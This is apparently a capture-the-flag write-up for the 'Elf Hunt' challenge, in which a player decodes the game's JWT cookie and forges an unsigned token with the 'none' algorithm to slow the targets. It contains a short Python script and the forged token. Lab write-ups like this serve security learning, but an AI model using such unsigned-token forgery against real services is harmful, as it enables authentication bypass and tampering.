Skip to content

Elf Hunt⚓︎

Difficulty:
Direct link: Objective5.zip

⚓︎

image

Objective⚓︎

Request

Piney Sappington needs a lesson in JSON web tokens. Hack Elf Hunt and score 75 points.

Piney Sappington

Hey there, friend! Piney Sappington here.

You look like someone who's good with puzzles and games.

I could really use your help with this Elf Hunt game I'm stuck on.

I think it has something to do with manipulating JWTs, but I'm a bit lost.

If you help me out, I might share some juicy secrets I've discovered.

Let's just say things around here haven't been exactly... normal.

So, what do ya say? Are you in?

Hints⚓︎

JWT Secrets Revealed

Unlock the mysteries of JWTs with insights from PortSwigger's JWT Guide.

Solution⚓︎

A Look at the Game⚓︎

tooFast

It is quickly apparent that the elves are way too fast, especially for anyone on a laptop with a trackpad for a mouse.

A Look at the JWT⚓︎

Using the Inspect tool within the browser and going to the Storage tab (in Firefox), grab the cookie and paste it into the decoder at jwt.io. cookie decode

Encoding the Slower Speed JWT⚓︎

Create a python script to create a new JWT with a lower speed.

import jwt

header = {
    "alg": "none",
    "typ": "JWT"
}

payload = {
    "speed": -50
}

# Encode the JWT without a key, as the algorithm is 'none'
encoded_jwt = jwt.encode(payload, key='', algorithm="none", headers=header)
print(encoded_jwt)
New JWT 
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzcGVlZCI6LTUwfQ.

winGame

The slower speed allows the elves to be more easily hit and with a little time and aim, 75 of them go down, thus completing the challenge.

Response⚓︎

Piney Sappington

Well done! You've brilliantly won Elf Hunt! I couldn't be more thrilled. Keep up the fine work, my friend!

What have you found there? The Captain's Journal? Yeah, he comes around a lot. You can find his comms office over at Brass Buoy Port on Steampunk Island.